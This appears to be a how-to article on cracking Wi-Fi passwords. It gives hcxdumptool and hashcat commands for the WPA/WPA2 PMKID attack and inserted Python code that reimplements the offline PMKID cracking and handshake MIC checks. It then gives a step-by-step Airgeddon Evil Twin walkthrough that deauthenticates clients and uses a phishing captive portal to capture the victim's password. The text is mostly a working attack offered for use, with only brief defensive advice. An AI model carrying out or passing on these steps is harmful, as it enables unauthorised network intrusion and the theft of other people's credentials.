How to Hack Wi-Fi Password Easily Using The New Attack On WPA/WPA2:
Looking for how to hack Wi-Fi password OR Wi-Fi hacking software? Well, a security expert has revealed a new Wi-Fi hacking technique that makes it easier for hackers to crack Wi-Fi passwords of many modern routers.
Discovered by Jens ‘Atom’ Steube, the lead developer of the well-known password-cracking tool Hashcat, the new attack works against WPA/WPA2 wireless networks that have PMKID (Pairwise Master Key Identifier)-based roaming features enabled.
Steube discovered the attack on WPA/WPA2-enabled Wi-Fi networks by accident while he was analyzing the newly-launched WPA3 security standard.
This new Wi-Fi hacking technique could potentially allow attackers to recover the Pre-shared Key (PSK) passwords, helping them to hack into your Wi-Fi network and eavesdrop on Internet communications.
According to the researcher, previously known Wi-Fi hacking techniques require the attacker to wait for a client to log into the network so that a full 4-way authentication handshake can be captured. The new attack no longer requires any client to be connected to the target access point: the value the attacker needs, the PMKID, is carried in the RSN IE (Robust Security Network Information Element) data of a single EAPOL (Extensible Authentication Protocol over LAN) frame, the first handshake message the access point sends after the attacker itself associates with it.
Robust Security Network is the 802.11i security framework for establishing a secure connection over an 802.11 wireless network, and the PMKID is one of the fields it can carry. The PMKID is not a key but an identifier of the Pairwise Master Key (PMK): it is computed as HMAC-SHA1-128 keyed with the PMK over the fixed string “PMK Name” concatenated with the access point’s and the client’s MAC addresses. On a WPA/WPA2-PSK network the PMK is itself derived from the passphrase and the SSID, so a captured PMKID is enough to test passphrase guesses offline, exactly as a captured 4-way handshake would be.
A pentester/hacker can use a tool such as hcxdumptool (v4.2.0 or later) to request the PMKID from the targeted wireless access point and dump the received frame to a file:
$ ./hcxdumptool -o captured.pcapng -i wlp39s0f3u4u5 --enable_status
Using another tool called hcxpcaptool, the output file (in .pcapng format) is then converted into the hash format accepted by Hashcat:
$ ./hcxpcaptool -z captured.16800 captured.pcapng
Finally, run the Hashcat (v4.2.0 or later) password-cracking tool in mode 16800 against the converted hash to recover the WPA PSK (Pre-Shared Key), and bingo, that’s how to hack a Wi-Fi password.
$ ./hashcat -m 16800 captured.16800 -w 3 -a 3 '?l?l?l?l?l?l?lt!'
The recovered value is the password of the target wireless access point. Cracking may take a long time depending on the password’s length and complexity, and the mask in the example above only covers passwords of seven lowercase letters followed by “t!”.
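To make the offline check concrete, the following is an added example (not code from the page, from Hashcat or from hcxtools) that reimplements what hashcat mode 16800 does: derive the PMK from a candidate passphrase and the SSID, compute the PMKID over “PMK Name” plus the two MAC addresses, and compare it with the captured one. It also parses the PMKID out of the Key Data field of a first EAPOL-Key message, where the PMKID sits in a KDE with element id 0xdd, length 0x14, OUI 00:0f:ac and data type 4. The MAC addresses, SSID, passphrase and candidate list are constructed for the example.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# 802.11 KDE header inside EAPOL-Key Key Data: OUI 00:0f:ac, data type 4 = PMKID
PMKID_KDE_OUI_TYPE = bytes.fromhex("000fac04")


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def extract_pmkid(key_data: bytes) -> Optional[bytes]:
    """Walk the Key Data field of EAPOL-Key message 1 and return the PMKID carried in a
    PMKID KDE (element id 0xdd, length 0x14, OUI 00:0f:ac, type 4, 16-byte PMKID).
    Any other element (e.g. an RSN IE) is skipped using its length byte."""
    i = 0
    while i + 2 <= len(key_data):
        eid, length = key_data[i], key_data[i + 1]
        body = key_data[i + 2:i + 2 + length]
        if eid == 0xDD and length == 0x14 and body[:4] == PMKID_KDE_OUI_TYPE:
            return body[4:20]
        i += 2 + length
    return None


def to_hashcat_16800(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """One hashcat mode-16800 line: PMKID*MAC_AP*MAC_STA*ESSID(hex)."""
    return f"{pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.encode().hex()}"


def crack_16800(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline guess check, as hashcat -m 16800 does: derive PMK and PMKID for each candidate
    and compare with the captured PMKID. No client traffic or 4-way handshake is needed."""
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    target = bytes.fromhex(pmkid_hex)
    ap_mac, sta_mac = bytes.fromhex(ap_hex), bytes.fromhex(sta_hex)
    ssid = bytes.fromhex(ssid_hex).decode()
    for cand in candidates:
        if hmac.compare_digest(compute_pmkid(derive_pmk(cand, ssid), ap_mac, sta_mac), target):
            return cand
    return None


def demo() -> Optional[str]:
    """Constructed capture: the MACs, SSID, passphrase and wordlist are made up for this example."""
    ap_mac = bytes.fromhex("020000000001")
    sta_mac = bytes.fromhex("020000000002")
    ssid, real_passphrase = "ExampleNet", "Spring2018!"
    # Simulate what the AP puts in message 1: a PMKID KDE, here preceded by an
    # RSN IE (CCMP/PSK) to show that unrelated elements are skipped.
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    real_pmkid = compute_pmkid(derive_pmk(real_passphrase, ssid), ap_mac, sta_mac)
    key_data = rsn_ie + bytes.fromhex("dd14000fac04") + real_pmkid
    pmkid = extract_pmkid(key_data)
    line = to_hashcat_16800(pmkid, ap_mac, sta_mac, ssid)
    return crack_16800(line, ["password", "letmein", "Spring2018!", "Winter2018!"])


if __name__ == "__main__":
    print(demo())
```

The cost of each guess is dominated by the 4096-iteration PBKDF2, which is why the attack is only practical against weak passphrases, and why the PMKID gives the attacker nothing extra over a captured handshake except the ability to obtain it without a client present.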
“At this time, we don’t know for which vendors or for which routers this method will work, but we think it’ll work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers),” Steube said. Since the new attack only works against networks with roaming functions enabled and still requires the attacker to brute-force the password, all users are recommended to protect their Wi-Fi network with a long, random passphrase that is difficult to crack.
This Wi-Fi hack also doesn’t work against next-generation WPA3 wireless security protocol, because the new protocol is “much harder to attack/hack because of its new and secure key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”
There is another method of WPA/WPA2 hacking, known as the Evil Twin attack, that relies on social engineering rather than on cracking and can be more efficient when the password is too strong to brute-force. It can be performed with a tool called Airgeddon:
To start using the Airgeddon wireless attack framework, we’ll need to download Airgeddon and any programs it requires. The developer also recommends installing a tool called CCZE to make the output easier to read; you can install it by typing apt-get install ccze in a terminal window. Next, download Airgeddon, change into its directory using the cd command, and start it from a terminal:
$ sudo bash ./airgeddon.sh
When you see the alien spaceship in the terminal, you know you are ready to hack.
Press enter to check the different tools the Airgeddon framework relies on. If you’re missing any of them, open a new terminal and type sudo apt-get install tool, substituting the name of the missing tool for “tool”. If that does not work, you can also try sudo pip install tool.
When you have all of the dependencies, proceed to the next step by pressing return/enter. Otherwise, you may experience issues during your attack, notably if you are missing dnsspoof.
The script will check for a working internet connection so it can update itself if a new version exists. When this completes, press enter to choose the network adapter to use.
After we select our wireless adapter, we’ll proceed to the main attack menu of the script.
Press 2 to put your wireless adapter into monitor mode. Next, select 7 for the “Evil Twin attacks” menu, and you’ll see the submenu for this attack module appear.
Select the Target:
Now that we are in the attack module, select option 9 for the “Evil Twin AP attack with a captive portal.” We will need to scan for targets, so press enter, and a new window will appear listing all nearby networks. Wait a few seconds for the list of nearby wireless access points to populate.
After it has run for a few seconds, close the small window, and a list of targets will appear in the main terminal window. Networks that have clients connected are shown in yellow with an asterisk next to them. This matters because you can’t trick someone into giving you the wireless password if no one is on the network.
Select the number of that target you wish to attack, and press enter to proceed to the next screen.
Gather the Handshake:
Now, we’ll select the type of deauthentication attack we want to use to kick the user off their trusted network. I recommend the second option, “Deauth aireplay-ng attack,” although different attacks will work better on different networks.
Press enter, and you’ll be asked if you’d like to enable DoS pursuit mode, which lets the attack follow the AP if it switches to another channel. Choose yes (Y) or no (N) depending on your preference, and then press enter. Finally, choose N when asked about using an interface with internet access. We do not need one for this attack, and not needing an internet source makes the attack more portable.
Next, it will ask whether you want to spoof your MAC address during the attack. In this case, we chose N for “no,” but it depends on what works best for you.
Now, if we don’t already have a 4-way handshake for this network, we’ll have to capture one. Be careful not to accidentally select Y for “Do you already have a captured Handshake file?” if you do not have one, because there is no way to go back without restarting the script.
Since we don’t yet have a 4-way handshake, type N for no, and press enter to start capturing.
Once the capture process has begun, a window with red text sending deauthentication packets and another window with white text will be listening for handshakes. You should wait for a while until you see “WPA Handshake:” and the BSSID (MAC) address of your targeted AP.
Once you see that you’ve finally got the handshake, you can exit the Capturing Handshake window. When airgeddon asks you if you got the handshake, you need to select Y and save the handshake file. Next, select the directory/folder for you to write the password to, and you’re ready to proceed to the final step to configure the phishing page.
Set Up the Phishing Page
In this step, before launching the attack, we need to set the language of the phishing web page. The page supplied by Airgeddon is good enough for this type of attack. We’ll select 1 for English. Once you have made your choice, press enter, and the attack will start, opening six windows that perform the different functions of the attack at the same time.
Capture Network Credentials
Once the attack is running, the victim should be kicked off their original network and see our fake AP as the only seemingly familiar option. Be patient and watch the status in the top-right window. It tells you when a device joins the network, so you can see any password attempts the victim makes once they are redirected to the captive portal.
When the victim joins our network, you’ll see a flurry of activity. In the top-right corner, you can see any failed password attempts, which will be checked against the handshake file we gathered. This will continue until the target inputs the correct password. When the victim finally enters the correct password, the windows will close except for the top-right window. The fake AP will vanish, and the victim will connect back to their original wireless network.
The credentials are displayed in the top-right window; copy and paste the password into a file to save it. Sometimes the script doesn’t save the file correctly, so don’t skip this step, or you might lose the password you just captured.
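The reason the captive portal can tell a wrong password from the right one, without ever contacting the real router, is the handshake captured earlier: the second EAPOL-Key message carries a MIC keyed with the KCK, which is derived from the PMK and the two nonces. The following is an added example (not Airgeddon’s code, which delegates this check to other tools, and not from the page) that reimplements the check for WPA2/CCMP, key descriptor version 2: build a constructed message 2, sign it with the real passphrase to stand in for the capture, then validate portal submissions in order until one reproduces the MIC. MACs, nonces, SSID, passphrase and the attempt list are constructed for the example.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# MIC field position inside an EAPOL-Key frame: 4-byte EAPOL header + 77 bytes of fixed fields
MIC_OFFSET, MIC_LEN = 81, 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes of the PTK are the KCK, which keys the handshake MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_m2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """EAPOL-Key message 2 with a zeroed MIC (constructed; a real M2 also carries the
    supplicant's RSN IE in key_data, which does not change the check)."""
    body = (
        b"\x02"                        # descriptor type: RSN
        + (0x010A).to_bytes(2, "big")  # key info: version 2, pairwise, MIC present
        + (16).to_bytes(2, "big")      # key length
        + (1).to_bytes(8, "big")       # replay counter
        + snonce                       # 32-byte SNonce
        + b"\x00" * 16                 # key IV
        + b"\x00" * 8                  # key RSC
        + b"\x00" * 8                  # key ID / reserved
        + b"\x00" * MIC_LEN            # MIC placeholder
        + len(key_data).to_bytes(2, "big") + key_data
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type EAPOL-Key


def verify_passphrase(candidate: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                      anonce: bytes, snonce: bytes, m2: bytes) -> bool:
    """The captive-portal check: does this candidate reproduce the MIC in the captured message 2?"""
    kck = derive_kck(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(kck, m2), m2[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


def first_valid_attempt(attempts: Iterable[str], ssid: str, ap_mac: bytes, sta_mac: bytes,
                        anonce: bytes, snonce: bytes, m2: bytes) -> Optional[str]:
    """Validate portal submissions in order; the first one that passes is the real PSK."""
    for attempt in attempts:
        if verify_passphrase(attempt, ssid, ap_mac, sta_mac, anonce, snonce, m2):
            return attempt
    return None


def demo() -> Optional[str]:
    """Constructed capture: MACs, nonces, SSID, passphrase and attempts are made up."""
    ap_mac, sta_mac = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    ssid, real = "ExampleNet", "Spring2018!"
    # Supplicant side: fill in the MIC with the real passphrase to stand in for a capture.
    kck = derive_kck(derive_pmk(real, ssid), ap_mac, sta_mac, anonce, snonce)
    m2 = build_m2(snonce)
    m2 = m2[:MIC_OFFSET] + eapol_mic(kck, m2) + m2[MIC_OFFSET + MIC_LEN:]
    # Attacker side: what the victim typed into the portal, in order.
    attempts = ["password", "spring2018", "Spring2018!"]
    return first_valid_attempt(attempts, ssid, ap_mac, sta_mac, anonce, snonce, m2)


if __name__ == "__main__":
    print(demo())
```

Only key descriptor version 2 (HMAC-SHA1, used by WPA2/CCMP) is handled; WPA/TKIP uses HMAC-MD5 and newer AKMs use AES-CMAC for the MIC, so a check for those networks would swap out eapol_mic. The same PBKDF2 cost applies here, which is why the portal only validates what the victim types rather than trying to guess.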